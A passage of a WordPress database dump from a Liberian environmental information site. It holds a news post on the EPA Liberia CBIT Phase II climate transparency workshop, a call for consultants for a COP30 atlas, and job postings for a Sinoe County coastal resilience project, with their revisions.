22:21:21','<!-- wp:paragraph -->\n<p>Monrovia, Liberia – July 16, 2025 – The Environmental Protection Agency Liberia has taken a major step toward enhancing its climate governance and reporting systems through a stakeholder consultation workshop for the second phase of the Capacity-Building Initiative for Transparency (CBIT) Project. The event, held at the Boulevard Hotel in Monrovia, brought together key actors from government ministries and agencies, civil society, development partners, and international organizations to shape the design of the CBIT Phase II project, officially titled “Strengthening the Capacity of Institutions in Liberia to Comply with the Transparency Requirements of the Paris Agreement.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the opening remarks, Dr. Emmanuel K. Urey Yarkpawolo, Executive Director of the Environmental Protection Agency (EPA) of Liberia, emphasized the significance of this phase in moving the country toward a more coordinated and transparent climate data management system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>⁠“Our focus today is on strengthening the institutions and systems that allow Liberia to meet its transparency obligations under the Paris Agreement,” Dr. Yarkpawolo stated.</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>“The Paris Agreement is not just about reducing emissions, it\'s about trust among nations through transparency. Every country, including Liberia, must be able to collect, manage, and report climate data accurately and regularly.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He highlighted the accomplishments of CBIT Phase I, including the development of basic climate data systems and capacity building among key institutions. However, he stressed that Phase II would go beyond initial activities to establish a strong national framework capable of sustaining long-term reporting across all sectors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA boss outlined four major goals for CBIT Phase II:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1.⁠ ⁠Improving institutional arrangements for data collection and reporting;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>2.⁠ ⁠Strengthening technical capacity across ministries and agencies to report on Liberia’s Nationally Determined Contributions (NDCs);</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>3.⁠ ⁠Making climate data more transparent and accessible;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>4.⁠ ⁠Ensuring gender and social inclusion in climate reporting systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>⁠“Transparency is no longer just a reporting requirement. It’s a strategic opportunity. The better we report, the better our chances of unlocking critical international support for our development and climate priorities,” Dr. Yarkpawolo added.</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>He also noted the importance of transparency in Liberia’s emerging carbon market policy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Mr. Tim Bromficu, Vice President for Africa, Strategy and Delivery at Conservation International (CI), echoed the EPA Executive Director’s sentiments, describing the workshop as a timely and vital gathering.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>⁠“This meeting is important; it will strengthen and give more understanding of greenhouse gas,” he said. “I encourage inclusive participation, including women and children, in Liberia’s climate action process.”</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>Mr. Bromficu emphasized CI’s long-term commitment to Liberia, noting that the organization has served as a Global Environment Facility (GEF) implementing partner since 2013. He expressed readiness to continue working alongside the government in advancing national development goals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the same time, Hon. Charles Umehai, Deputy Minister for Energy at the Ministry of Mines and Energy, also spoke at the event, underscoring the urgency of action over words in Liberia’s climate journey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>⁠“Climate is key for Liberia. We are expecting a positive outcome from this meeting,” Minister Umehai said. “Let’s work the talk and not only talk the talk.”</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>He thanked CI, the EPA, and other stakeholders for fostering cooperation that supports Liberia’s climate and development priorities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop served as a platform for dialogue on emissions monitoring, adaptation reporting, institutional coordination, and inclusive stakeholder engagement. Participants pledged to support the CBIT process and committed to continuous collaboration as Liberia moves forward in building a resilient, transparent, and climate-smart future.</p>\n<!-- /wp:paragraph -->','EPA Liberia Advances Climate Transparency Commitments Through Stakeholder Consultation Workshop','','inherit','closed','closed','','5515-revision-v1','','','2025-07-16 22:21:21','2025-07-16 22:21:21','',5515,'https://ekmsliberia.info/?p=5517',0,'revision','',0),(5518,38,'2025-07-21 17:50:48','2025-07-21 17:50:48','<div><b>BACKGROUND</b></div>\r\n<div>\r\n\r\nLiberia is endowed with rich biodiversity, unique ecosystems, and stunning natural landscapes. Its natural capital includes over 40% of the remaining Upper Guinean Rainforest, extensive river systems, wetlands, mangroves, and a vibrant coastline. These ecosystems support a wide range of endemic and endangered species, such as the pygmy hippopotamus, forest elephants, and western chimpanzees. Liberia’s forests also play a critical role in regional climate regulation and carbon sequestration, making them globally significant for climate action.\r\n\r\nIn addition to its ecological value, Liberia’s natural resources present untapped opportunities for sustainable investment. Sectors such as ecotourism, sustainable forestry, carbon finance, and renewable energy offer potential for green growth, job creation, and community development. However, these assets remain under-documented and under-promoted, limiting their contribution to national development and global conservation efforts. This underrepresentation hinders the country’s ability to harness its ecological assets for sustainable economic growth, climate resilience, and community development.\r\n\r\n</div>\r\nTo address the visibility and knowledge gap surrounding Liberia’s natural assets, the Government of Liberia, supported by the United Nations Development Programme (UNDP) and other partners, is leading the development of a flagship publication titled, <strong>the <em>Atlas of the Natural Beauty and Wonders of Liberia</em>.</strong> This nationwide initiative is funded by UNDP and scheduled to be implemented over a three (3)-months period, will document and showcase Liberia’s most valuable ecological and cultural landscapes. The Atlas aims to position Liberia’s natural heritage as both a driver of national development and a priority for global conservation.\r\n\r\nThe publication is expected to be launched at the 30th Session of the Conference of the Parties (COP 30) to the United Nations Framework Convention on Climate Change (UNFCCC), to be held in Brazil. It is envisioned as a high-impact advocacy and promotional tool to elevate Liberia’s environmental profile on the international stage and mobilize support for nature-based solutions, climate action, and sustainable green investment.\r\n\r\nClick to <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/Draft-ToR-Atlas-COP30.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','CALL FOR EXPRESSION OF INTEREST: Consultancy Services for the Development of an Atlas Showcasing the Natural Beauty and Wonders of Liberia','','publish','closed','closed','','call-for-expression-of-interest-consultancy-services-for-the-development-of-an-atlas-showcasing-the-natural-beauty-and-wonders-of-liberia','','','2025-07-21 17:50:48','2025-07-21 17:50:48','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5518',52,'ekms_bulletin','',0),(5519,38,'2025-07-21 17:49:12','2025-07-21 17:49:12','','Draft ToR Atlas COP30','','inherit','open','closed','','draft-tor-atlas-cop30','','','2025-07-21 17:49:12','2025-07-21 17:49:12','',0,'https://ekmsliberia.info/wp-content/uploads/2025/07/Draft-ToR-Atlas-COP30.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5520,38,'2025-07-21 17:50:48','2025-07-21 17:50:48','<div><b>BACKGROUND</b></div>\r\n<div>\r\n\r\nLiberia is endowed with rich biodiversity, unique ecosystems, and stunning natural landscapes. Its natural capital includes over 40% of the remaining Upper Guinean Rainforest, extensive river systems, wetlands, mangroves, and a vibrant coastline. These ecosystems support a wide range of endemic and endangered species, such as the pygmy hippopotamus, forest elephants, and western chimpanzees. Liberia’s forests also play a critical role in regional climate regulation and carbon sequestration, making them globally significant for climate action.\r\n\r\nIn addition to its ecological value, Liberia’s natural resources present untapped opportunities for sustainable investment. Sectors such as ecotourism, sustainable forestry, carbon finance, and renewable energy offer potential for green growth, job creation, and community development. However, these assets remain under-documented and under-promoted, limiting their contribution to national development and global conservation efforts. This underrepresentation hinders the country’s ability to harness its ecological assets for sustainable economic growth, climate resilience, and community development.\r\n\r\n</div>\r\nTo address the visibility and knowledge gap surrounding Liberia’s natural assets, the Government of Liberia, supported by the United Nations Development Programme (UNDP) and other partners, is leading the development of a flagship publication titled, <strong>the <em>Atlas of the Natural Beauty and Wonders of Liberia</em>.</strong> This nationwide initiative is funded by UNDP and scheduled to be implemented over a three (3)-months period, will document and showcase Liberia’s most valuable ecological and cultural landscapes. The Atlas aims to position Liberia’s natural heritage as both a driver of national development and a priority for global conservation.\r\n\r\nThe publication is expected to be launched at the 30th Session of the Conference of the Parties (COP 30) to the United Nations Framework Convention on Climate Change (UNFCCC), to be held in Brazil. It is envisioned as a high-impact advocacy and promotional tool to elevate Liberia’s environmental profile on the international stage and mobilize support for nature-based solutions, climate action, and sustainable green investment.\r\n\r\nClick to <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/Draft-ToR-Atlas-COP30.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','CALL FOR EXPRESSION OF INTEREST: Consultancy Services for the Development of an Atlas Showcasing the Natural Beauty and Wonders of Liberia','','inherit','closed','closed','','5518-revision-v1','','','2025-07-21 17:50:48','2025-07-21 17:50:48','',5518,'https://ekmsliberia.info/?p=5520',0,'revision','',0),(5521,38,'2025-07-21 19:46:33','0000-00-00 00:00:00','','CALL FOR EXPRESSION OF INTEREST: Consultancy Services for a Communications Specialist to Support the Development of an Atlas Showcasing Liberia’s Natural Beauty and Wonders','','draft','closed','closed','','','','','2025-07-21 19:46:33','2025-07-21 19:46:33','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5521',51,'ekms_bulletin','',0),(5522,38,'2025-07-22 09:02:40','2025-07-22 09:02:40','<h5><strong>PROJECT BACKGROUND</strong></h5>\r\n<strong> </strong>The EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems. In addition, the vulnerability of Liberia’s coastal communities and their resilience to climate change, particularly in Sinoe County, is exacerbated by the limited capacity of the GoL to provide essential services and adequate support for, among other things, water and sanitation, healthcare, utility-scale energy, and road infrastructure.\r\n<h5><strong>OBJECTIVE OF THE ASSIGNMENT</strong></h5>\r\nThe objective of this consultancy is to document the validation process and deliver recommendations during the workshop. This entails a critical assessment of the accuracy and completeness of the reports under review. The validation process aims to identify inconsistencies, errors, and gaps in the methodological approaches used during both the data collection and analysis processes.\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/Final_ToR_Validation-Workshop-for-MCA-and-VAM_International-CC-CA-Expert_06.12.25-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Job Title: International Climate Change and Coastal Adaptation Specialist','','publish','closed','closed','','job-title-international-climate-change-and-coastal-adaptation-specialist','','','2025-07-22 09:02:40','2025-07-22 09:02:40','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5522',50,'ekms_bulletin','',0),(5523,38,'2025-07-22 08:50:30','2025-07-22 08:50:30','<h5><strong>PROJECT BACKGROUND</strong></h5>\r\n<strong> </strong>The EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems. In addition, the vulnerability of Liberia’s coastal communities and their resilience to climate change, particularly in Sinoe County, is exacerbated by the limited capacity of the GoL to provide essential services and adequate support for, among other things, water and sanitation, healthcare, utility-scale energy, and road infrastructure.\r\n<h5><strong>OBJECTIVE OF THE ASSIGNMENT</strong></h5>\r\nThe objective of this consultancy is to document the validation process and deliver recommendations during the workshop. This entails a critical assessment of the accuracy and completeness of the reports under review. The validation process aims to identify inconsistencies, errors, and gaps in the methodological approaches used during both the data collection and analysis processes.','Job Title: International Climate Change and Coastal Adaptation Specialist','','inherit','closed','closed','','5522-revision-v1','','','2025-07-22 08:50:30','2025-07-22 08:50:30','',5522,'https://ekmsliberia.info/?p=5523',0,'revision','',0),(5524,38,'2025-07-22 08:51:11','2025-07-22 08:51:11','','Final_ToR_Validation Workshop for MCA and VAM_International CC & CA Expert_06.12.25 (1)','','inherit','open','closed','','final_tor_validation-workshop-for-mca-and-vam_international-cc-ca-expert_06-12-25-1','','','2025-07-22 08:51:11','2025-07-22 08:51:11','',0,'https://ekmsliberia.info/wp-content/uploads/2025/07/Final_ToR_Validation-Workshop-for-MCA-and-VAM_International-CC-CA-Expert_06.12.25-1.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5525,38,'2025-07-22 09:02:40','2025-07-22 09:02:40','<h5><strong>PROJECT BACKGROUND</strong></h5>\r\n<strong> </strong>The EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems. In addition, the vulnerability of Liberia’s coastal communities and their resilience to climate change, particularly in Sinoe County, is exacerbated by the limited capacity of the GoL to provide essential services and adequate support for, among other things, water and sanitation, healthcare, utility-scale energy, and road infrastructure.\r\n<h5><strong>OBJECTIVE OF THE ASSIGNMENT</strong></h5>\r\nThe objective of this consultancy is to document the validation process and deliver recommendations during the workshop. This entails a critical assessment of the accuracy and completeness of the reports under review. The validation process aims to identify inconsistencies, errors, and gaps in the methodological approaches used during both the data collection and analysis processes.\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/Final_ToR_Validation-Workshop-for-MCA-and-VAM_International-CC-CA-Expert_06.12.25-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Job Title: International Climate Change and Coastal Adaptation Specialist','','inherit','closed','closed','','5522-revision-v1','','','2025-07-22 09:02:40','2025-07-22 09:02:40','',5522,'https://ekmsliberia.info/?p=5525',0,'revision','',0),(5526,38,'2025-07-22 09:18:24','2025-07-22 09:18:24','<div><b>Project Background</b></div>\r\n<div>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\n</div>\r\n<div><b>Scope of Work</b></div>\r\n<div>\r\n\r\nAs per component three of the project, 800 m of revetment and five 20-m groynes must be constructed Downtown, while 700 m of revetment must be installed in Seebeh, the two communities mostly threatened by erosion in Greenville. Implementing this component of the project cannot be done without skilled workers (engineers, equipment operators, etc.) and unskilled laborers (flaggers, safety representatives, geotextile installers, traffic directors, etc.). Considering that the engineers will be seconded by implementing partners, including the Ministry of Public Works and the Ministry of Mines and Energy, the project must contract a Human Resource Management Firm (HRMF) that will shoulder the responsibility of hiring forty-four (44) unskilled laborers who shall be recommended by their respective communities.\r\n\r\nThe task of the HRMF not only includes the hiring process, but it also covers time management, contract administration, safety management, and attendance management of the workers throughout the construction. The responsibilities for the laborers shall be defined by the firm in full consultation with the project. For example, there shall be four groups of ten workers, with each group headed by a supervisor. The group shall include the technical team, the traffic management team, the occupational health and safety (OHS) team, and the waste management team\r\n\r\nClick to<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/Final_HR-Firm-for-Daily-Hires_07.12.25-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>','Job Title :Human Resource Firm (National)','','publish','closed','closed','','job-title-human-resource-firm-national','','','2025-07-22 09:18:24','2025-07-22 09:18:24','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5526',49,'ekms_bulletin','',0),(5527,38,'2025-07-22 09:09:49','2025-07-22 09:09:49','<div><b>Project Background</b></div>\r\n<div>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\n</div>\r\n<div><b>Scope of Work</b></div>\r\n<div>\r\n\r\nAs per component three of the project, 800 m of revetment and five 20-m groynes must be constructed Downtown, while 700 m of revetment must be installed in Seebeh, the two communities mostly threatened by erosion in Greenville. Implementing this component of the project cannot be done without skilled workers (engineers, equipment operators, etc.) and unskilled laborers (flaggers, safety representatives, geotextile installers, traffic directors, etc.). Considering that the engineers will be seconded by implementing partners, including the Ministry of Public Works and the Ministry of Mines and Energy, the project must contract a Human Resource Management Firm (HRMF) that will shoulder the responsibility of hiring forty-four (44) unskilled laborers who shall be recommended by their respective communities.\r\n\r\nThe task of the HRMF not only includes the hiring process, but it also covers time management, contract administration, safety management, and attendance management of the workers throughout the construction. The responsibilities for the laborers shall be defined by the firm in full consultation with the project. For example, there shall be four groups of ten workers, with each group headed by a supervisor. The group shall include the technical team, the traffic management team, the occupational health and safety (OHS) team, and the waste management tea\r\n\r\n</div>','Job Title :Human Resource Firm (National)','','inherit','closed','closed','','5526-revision-v1','','','2025-07-22 09:09:49','2025-07-22 09:09:49','',5526,'https://ekmsliberia.info/?p=5527',0,'revision','',0),(5528,38,'2025-07-22 09:16:06','2025-07-22 09:16:06','','Final_HR Firm for Daily Hires_07.12.25 (1)','','inherit','open','closed','','final_hr-firm-for-daily-hires_07-12-25-1','','','2025-07-22 09:16:06','2025-07-22 09:16:06','',0,'https://ekmsliberia.info/wp-content/uploads/2025/07/Final_HR-Firm-for-Daily-Hires_07.12.25-1.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5529,38,'2025-07-22 09:18:24','2025-07-22 09:18:24','<div><b>Project Background</b></div>\r\n<div>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\n</div>\r\n<div><b>Scope of Work</b></div>\r\n<div>\r\n\r\nAs per component three of the project, 800 m of revetment and five 20-m groynes must be constructed Downtown, while 700 m of revetment must be installed in Seebeh, the two communities mostly threatened by erosion in Greenville. Implementing this component of the project cannot be done without skilled workers (engineers, equipment operators, etc.) and unskilled laborers (flaggers, safety representatives, geotextile installers, traffic directors, etc.). Considering that the engineers will be seconded by implementing partners, including the Ministry of Public Works and the Ministry of Mines and Energy, the project must contract a Human Resource Management Firm (HRMF) that will shoulder the responsibility of hiring forty-four (44) unskilled laborers who shall be recommended by their respective communities.\r\n\r\nThe task of the HRMF not only includes the hiring process, but it also covers time management, contract administration, safety management, and attendance management of the workers throughout the construction. The responsibilities for the laborers shall be defined by the firm in full consultation with the project. For example, there shall be four groups of ten workers, with each group headed by a supervisor. The group shall include the technical team, the traffic management team, the occupational health and safety (OHS) team, and the waste management team\r\n\r\nClick to<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/Final_HR-Firm-for-Daily-Hires_07.12.25-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>','Job Title :Human Resource Firm (National)','','inherit','closed','closed','','5526-revision-v1','','','2025-07-22 09:18:24','2025-07-22 09:18:24','',5526,'https://ekmsliberia.info/?p=5529',0,'revision','',0),(5530,38,'2025-07-22 09:38:11','2025-07-22 09:38:11','<h5><strong>PROJECT BACKGROUND</strong></h5>\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n<div>\r\n<h5><b>OBJECTIVE OF THE ASSIGNMENT</b></h5>\r\n</div>\r\nThe objective of this consultancy is to document the validation process and deliver recommendations during the workshop. This entails a critical assessment of the accuracy and completeness of the reports under review. The validation process aims to identify inconsistencies, errors, and gaps in the methodological approaches used during both the data collection and analysis processes\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/Final_ToR_National-Consultan-Validation-Workshop-t-MCA-VAM_07.18.25-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Job Title: National Climate Change and Coastal Adaptation Specialist','','publish','closed','closed','','job-title-national-climate-change-and-coastal-adaptation-specialist','','','2025-07-22 09:38:11','2025-07-22 09:38:11','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5530',48,'ekms_bulletin','',0),(5531,38,'2025-07-22 09:32:39','2025-07-22 09:32:39','<h5><strong>PROJECT BACKGROUND</strong></h5>\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n<div>\r\n<h5><b>OBJECTIVE OF THE ASSIGNMENT</b></h5>\r\n</div>\r\nThe objective of this consultancy is to document the validation process and 